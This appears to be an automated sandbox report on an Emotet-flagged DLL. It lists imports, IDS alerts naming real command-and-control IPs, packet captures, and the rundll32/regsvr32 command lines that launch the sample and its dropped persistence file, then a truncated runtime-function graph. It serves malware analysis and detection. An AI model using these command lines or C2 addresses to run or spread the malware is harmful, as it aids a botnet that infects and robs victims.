SizeofResource, InterlockedExchange, GlobalLock, lstrcmpA, GlobalAlloc, GetModuleHandleA, CreateThread, CloseHandle, VirtualProtect, LoadLibraryA, VirtualAlloc, GetProcAddress, SetLastError, Sleep, IsBadReadPtr, GetProcessHeap, VirtualFree, HeapFree, HeapAlloc, FreeLibrary, VirtualQuery, SetHandleCount, GetNativeSystemInfo
                                                                                                        USER32.dllLoadCursorA, GetSysColorBrush, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, GetForegroundWindow, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, SetMenu, SetForegroundWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetMenuItemID, GetMenuItemCount, GetSubMenu, UnhookWindowsHookEx, GetSysColor, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, GetWindowTextLengthA, GetWindowTextA, GetWindow, SetFocus, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetWindowsHookExA, CallNextHookEx, GetMessageA, DestroyMenu, UpdateWindow, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, PostQuitMessage, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, SetTimer, IsIconic, KillTimer, LoadIconA, DrawIcon, GetClientRect, SendMessageA, ShowWindow, PostMessageA, GetSystemMetrics, EnableWindow, GetMenu
                                                                                                        GDI32.dllGetStockObject, SelectObject, GetDeviceCaps, DeleteDC, Escape, ExtTextOutA, TextOutA, RectVisible, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, CreateBitmap, PtVisible, GetObjectA, DeleteObject, GetClipBox, SetMapMode, SetTextColor, SetBkColor, RestoreDC, SaveDC, SetViewportOrgEx
                                                                                                        WINSPOOL.DRVDocumentPropertiesA, ClosePrinter, OpenPrinterA
                                                                                                        ADVAPI32.dllRegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                                                                                                        SHLWAPI.dllPathFindExtensionA
                                                                                                        OLEAUT32.dllVariantClear, VariantChangeType, VariantInit
                                                                                                        WS2_32.dllhtons, setsockopt, sendto, htonl, bind, socket, closesocket, inet_addr, recvfrom, WSACleanup, WSAStartup

                                                                                                        Exports

                                                                                                        NameOrdinalAddress
                                                                                                        DllRegisterServer10x1001df20

                                                                                                        Possible Origin

                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        ChineseChina
                                                                                                        EnglishUnited States

                                                                                                        Network Behavior

                                                                                                        Snort IDS Alerts

                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                        01/14/22-18:50:50.021159TCP2404332ET CNC Feodo Tracker Reported CnC Server TCP group 174977080192.168.2.445.138.98.34
                                                                                                        01/14/22-18:50:51.303705TCP2404338ET CNC Feodo Tracker Reported CnC Server TCP group 20497718080192.168.2.469.16.218.101

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 14, 2022 18:50:50.021158934 CET4977080192.168.2.445.138.98.34
                                                                                                        Jan 14, 2022 18:50:50.038119078 CET804977045.138.98.34192.168.2.4
                                                                                                        Jan 14, 2022 18:50:50.591777086 CET4977080192.168.2.445.138.98.34
                                                                                                        Jan 14, 2022 18:50:50.608776093 CET804977045.138.98.34192.168.2.4
                                                                                                        Jan 14, 2022 18:50:51.279369116 CET4977080192.168.2.445.138.98.34
                                                                                                        Jan 14, 2022 18:50:51.298029900 CET804977045.138.98.34192.168.2.4
                                                                                                        Jan 14, 2022 18:50:51.303704977 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:50:51.431086063 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:51.431241035 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:50:51.456213951 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:50:51.582878113 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:51.595963001 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:51.595987082 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:51.596095085 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:50:55.157601118 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:50:55.284152985 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:55.284693003 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:55.284796000 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:50:55.288050890 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:50:55.414614916 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:56.054250002 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:56.054380894 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:50:59.054255962 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:59.054287910 CET80804977169.16.218.101192.168.2.4
                                                                                                        Jan 14, 2022 18:50:59.054326057 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:50:59.054374933 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:52:39.992589951 CET497718080192.168.2.469.16.218.101
                                                                                                        Jan 14, 2022 18:52:39.992621899 CET497718080192.168.2.469.16.218.101

                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Start time:18:50:09
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll"
                                                                                                        Imagebase:0x1230000
                                                                                                        File size:116736 bytes
                                                                                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.720219818.0000000000DE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.720240608.0000000000E11000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.722455601.0000000000E11000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.722263663.0000000000DE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.742599060.0000000000DE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate

                                                                                                        General

                                                                                                        Start time:18:50:10
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1
                                                                                                        Imagebase:0x11d0000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:18:50:10
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dll
                                                                                                        Imagebase:0x20000
                                                                                                        File size:20992 bytes
                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.669938310.0000000002541000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.669913455.0000000002510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:18:50:10
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1
                                                                                                        Imagebase:0xb00000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.670020972.0000000004740000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.670044528.0000000004771000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:18:50:10
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\nV5Wu77N8J.dll,DllRegisterServer
                                                                                                        Imagebase:0xb00000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719826672.00000000053B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719773637.00000000052F1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719527275.0000000004CB1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719898030.0000000005510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719919636.0000000005541000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719503580.0000000004C80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719747240.00000000052B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719938381.0000000005570000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719857103.00000000053E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:18:50:11
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer
                                                                                                        Imagebase:0xb00000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:18:50:11
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer
                                                                                                        Imagebase:0xb00000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.718904101.00000000034D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.719243124.0000000005161000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.719379711.00000000052A1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.719211601.0000000005130000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.719345888.0000000005270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.719316941.0000000005241000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.719284878.0000000005210000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:18:50:23
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:18:50:34
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bdaefwhkzqb\lrinxnmhyts.ogu",XLurkV
                                                                                                        Imagebase:0xb00000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.723238837.0000000004750000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.723309788.0000000004781000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:18:50:35
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:18:50:36
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7128 -ip 7128
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:18:50:36
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bdaefwhkzqb\lrinxnmhyts.ogu",DllRegisterServer
                                                                                                        Imagebase:0xb00000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188125968.00000000049D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1190726376.00000000059A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1190213897.00000000057D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188426833.0000000005110000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188330842.0000000005030000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188469714.0000000005141000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1186610997.0000000002E00000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188598739.00000000052A1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188659452.0000000005301000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188052400.00000000049A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1190813785.0000000005A20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1190127401.00000000057A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188878871.00000000055E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1186687872.0000000002E31000.00000020.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188363449.0000000005061000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1190848028.0000000005A51000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188631120.00000000052D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188973289.00000000056F1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188839400.00000000055B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188934735.00000000056C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1188553677.0000000005270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.1190787571.00000000059D1000.00000020.00000001.sdmp, Author: Joe Security

                                                                                                        General

                                                                                                        Start time:18:50:38
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 568
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:18:50:40
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:18:50:58
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:18:51:11
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Disassembly

                                                                                                        Code Analysis

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.6%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:6.5%
                                                                                                          Total number of Nodes:1053
                                                                                                          Total number of Limit Nodes:38

                                                                                                          Graph

                                                                                                          execution_graph 16544 100036a0 16547 1002e654 16544->16547 16546 100036c0 16548 1002e707 16547->16548 16556 1002e666 16547->16556 16549 1003654f _realloc 6 API calls 16548->16549 16557 1002e6f3 16549->16557 16553 1002e6c3 RtlAllocateHeap 16553->16556 16554 1002e677 16554->16556 16559 10036507 16554->16559 16565 1003635c 16554->16565 16585 100306e0 16554->16585 16556->16553 16556->16554 16556->16557 16588 1002e605 16556->16588 16596 1003654f 16556->16596 16557->16546 16560 1003650e __set_error_mode 16559->16560 16561 1003635c __NMSG_WRITE 26 API calls 16560->16561 16563 1003653d 16560->16563 16562 10036533 16561->16562 16564 1003635c __NMSG_WRITE 26 API calls 16562->16564 16563->16554 16564->16563 16568 10036370 __set_error_mode 16565->16568 16566 100364d0 GetStdHandle 16567 100364de _strlen 16566->16567 16583 100364cb 16566->16583 16569 100364f7 WriteFile 16567->16569 16567->16583 16568->16566 16570 100363b5 _strcpy_s 16568->16570 16568->16583 16569->16583 16571 100363eb GetModuleFileNameA 16570->16571 16572 100363de __invoke_watson 16570->16572 16570->16583 16573 10036409 _strcpy_s 16571->16573 16579 1003642f __NMSG_WRITE _strlen 16571->16579 16572->16571 16574 10036420 __invoke_watson 16573->16574 16573->16579 16574->16579 16575 10036474 16576 10036476 _strcat_s 16575->16576 16577 10036496 _strcat_s 16576->16577 16578 10036489 __invoke_watson 16576->16578 16580 100364bb 16577->16580 16581 100364ae __invoke_watson 16577->16581 16578->16577 16579->16575 16584 10036463 __invoke_watson 16579->16584 16599 1003e278 16580->16599 16581->16580 16583->16554 16584->16576 16653 100306b5 GetModuleHandleW 16585->16653 16590 1002e611 16588->16590 16589 1002e642 16589->16556 16590->16589 16656 10035865 16590->16656 16592 1002e627 16663 10036077 16592->16663 16597 10034524 __decode_pointer 6 API calls 16596->16597 16598 1003655f 16597->16598 16598->16556 16626 1003451b 16599->16626 16602 1003e29b LoadLibraryA 16604 1003e2b0 GetProcAddress 16602->16604 16605 1003e3c5 16602->16605 16603 1003e323 16622 1003e34d 16603->16622 16639 10034524 TlsGetValue 16603->16639 16604->16605 16607 1003e2c6 16604->16607 16605->16583 16606 1003e378 16609 10034524 __decode_pointer 6 API calls 16606->16609 16629 100344a9 TlsGetValue 16607->16629 16609->16605 16610 10034524 __decode_pointer 6 API calls 16619 1003e390 16610->16619 16614 10034524 __decode_pointer 6 API calls 16614->16622 16615 100344a9 __encode_pointer 6 API calls 16616 1003e2e1 GetProcAddress 16615->16616 16617 100344a9 __encode_pointer 6 API calls 16616->16617 16618 1003e2f6 GetProcAddress 16617->16618 16620 100344a9 __encode_pointer 6 API calls 16618->16620 16619->16606 16621 10034524 __decode_pointer 6 API calls 16619->16621 16623 1003e30b 16620->16623 16621->16606 16622->16606 16622->16610 16623->16603 16624 1003e315 GetProcAddress 16623->16624 16625 100344a9 __encode_pointer 6 API calls 16624->16625 16625->16603 16627 100344a9 __encode_pointer 6 API calls 16626->16627 16628 10034522 16627->16628 16628->16602 16628->16603 16630 100344e2 GetModuleHandleW 16629->16630 16631 100344c1 16629->16631 16633 100344f2 16630->16633 16634 100344fd GetProcAddress 16630->16634 16631->16630 16632 100344cb TlsGetValue 16631->16632 16637 100344d6 16632->16637 16649 1003065c 16633->16649 16635 100344da GetProcAddress 16634->16635 16635->16615 16637->16630 16637->16635 16640 1003455d GetModuleHandleW 16639->16640 16641 1003453c 16639->16641 16643 10034578 GetProcAddress 16640->16643 16644 1003456d 16640->16644 16641->16640 16642 10034546 TlsGetValue 16641->16642 16647 10034551 16642->16647 16646 10034555 16643->16646 16645 1003065c __crt_waiting_on_module_handle 2 API calls 16644->16645 16648 10034573 16645->16648 16646->16614 16647->16640 16647->16646 16648->16643 16648->16646 16650 10030667 Sleep GetModuleHandleW 16649->16650 16651 10030685 16650->16651 16652 10030689 16650->16652 16651->16650 16651->16652 16652->16634 16652->16635 16654 100306c9 GetProcAddress 16653->16654 16655 100306d9 ExitProcess 16653->16655 16654->16655 16657 1003587a 16656->16657 16658 1003588d EnterCriticalSection 16656->16658 16672 100357a2 16657->16672 16658->16592 16660 10035880 16660->16658 16693 1003068c 16660->16693 16666 100360a5 16663->16666 16664 1003614e ___sbh_alloc_new_group 16665 1002e632 16664->16665 16669 1002e64b 16665->16669 16666->16664 16666->16665 16735 10035bde 16666->16735 16742 1003578b LeaveCriticalSection 16669->16742 16671 1002e652 16671->16589 16673 100357ae 16672->16673 16674 10036507 __FF_MSGBANNER 26 API calls 16673->16674 16684 100357d4 16673->16684 16676 100357c3 16674->16676 16678 1003635c __NMSG_WRITE 26 API calls 